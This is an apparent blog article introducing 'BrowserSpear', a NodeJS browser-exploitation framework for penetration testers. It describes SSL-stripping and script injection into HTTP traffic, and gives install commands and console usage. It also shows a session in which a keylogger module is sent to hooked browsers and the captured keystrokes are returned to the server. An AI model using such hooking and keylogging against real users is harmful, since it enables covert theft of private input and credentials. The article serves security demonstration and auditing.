With the rise of more IoT devices and other cheap off-the-shelf development platforms there is an opportunity to optimize the toolsets of Red-teamers, Penetration Testers and Ethical Hackers. To take full advantage of these devices we need our frameworks to be light and flexible. In this article, I want to present a tool that I built called ‘BrowserSpear’. It consist of a basic framework to exploit browsers and is capable of working on all architectures with basic server capacity. Feedback is always welcome.
When demonstrating the need for network security, there are few tools that can really get the appropriate reaction and are easy enough to demo to a crowd of people without actually sending malicious code or using an exploit which might crash the device.
A great demo is to try to downgrade the security of traffic on a network from SSL to unencrypted HTTP. We can do this with tools such as Bettercap, SSLstrip or another variant. After this security downgrade, it is possible to inject extra code into HTTP connections to make the website’s background pink or give an alert. Just something that is very noticable to a user and that will get a reaction.
What takes this to the next level is Browser Exploitation. The very famous tool BeEF (Browser Exploitation Framework Project) can control the complete website a target loaded over an unsecure connection after an extra script is injected into it which ‘hooks’ the client and makes it receive commands from BeEF.
Browser Exploitation is nothing new and BeEF is a well-known tool, but it is a bit older, and needs a lot of extra dependencies. Here is were the usage of old libraries like libv8 and specific Ruby gems start to become an issue. Which makes it almost impossible to install on the newer architectures like ARM.
We see many auditing devices built on a mobile architecture such as ARM surface such as the WiFi Pineapple, Packet Squirrel and even your own rooted Android smartphone. Which are compact tools that make a great portable and reliable platform. Using these devices on-the-go or for example a Raspberry Pi as a low-powered server in the cloud is an excellent use of these new and cheaper devices to audit networks and demonstrate attack vectors.
So what is BrowserSpear?
A device that has the server capacity to run NodeJS will be able to act as a server to ‘spear’ browsers and the complete behavior of the server can be controlled from a shell prompt or scripted beforehand.
BrowserSpear is still under development, but can be found in this Github repo. The core functionalities like code delivery and hooking or ‘spearing’ targets are fully working.
How to get started
With NodeJS and NPM installed (through your favourite package manager). Clone the Github-repo and install the following packages:
git clone https://github.com/larsveelaert/browserspear.git npm install websockets prompt uglify-js commander
Starting a console session is as simple as running the script. –help will give you all the extra info you need for advanced configuration.
$ node browserspear.js --help Usage: browserspear [options] Options: -V, --version output the version number -c, --commandfile <file> file with commands to run in the console -p, --port <port> Port to listen on -i, --ip <ip> The ip address to use in the reverse connection -s, --start Start a listener immediatly -h, --help output usage informatio
In the BrowserSpear console. You can get a list of available commands by typing ‘help’. Here is an extract:
>>> help Available commands: - start | restart Restarts the server that serves the spear and provides the socket to connect to - set <property> <value> Sets a value used by the server or module. ex. 'set LHOST: mydomain.org' - options List all the values of the options. - load <module> Loads the functions inside that module. Only one module can be selected at once. ex. 'load keylogger' - modules <search> Gives a list of all available modules, with an optional searchterm. - exec Executes the 'exec' function of the current selected module. Ex. send a payload - conns List all connections to the server - help Print this help.
The default address of the spear is localhost:1337. So navigating to this address on you local device running the server (started with start). Would give you the following output:
>>> start >>> Tue Jan 02 2018 14:11:14 GMT+0000 (UTC) Server is listening on port 1337 New connection to client at ::1 >>> conns List of connections:  ::1
Now we can load a module, for example an attack that logs all keystrokes in that browser called a keylogger. By default, the attack is sent to all the clients connected. The client will then record the keystrokes and send them to the server. The attack will stay active, even if the server is restarted or the module is unloaded.
>>> load keylogger >>> keylogger: exec Payload sent >>> keylogger: https://www.linkedin.com/redir/invalid-link-page?url=%5B%3A%3A1%5D KEYLOGGER:I will now tell you all my secrets
Looking forward to the Progressive Web Applications. There is a need to correctly mitigate against this attack vector because the native API’s already available in the browser are quite powerful and can be easily used against the user (ex. HTML5 webcam, Mic, GPS, Contacts, File access, …). The ever smaller gap between online and offline will create a need for strong security analysis so system access can be strictly controlled.
Goals and Roadmap
BrowserSpear will keep expanding it’s capabilities aiming towards connection types (including obfiscation/evasion) and pre-configured payloads to make the complete framework very easy to use and very ‘hackable’.
As it is an open-source project, development will happen through its Github page. Please feel free to contact me for more info, give feedback or even help to develop the project to its full potential.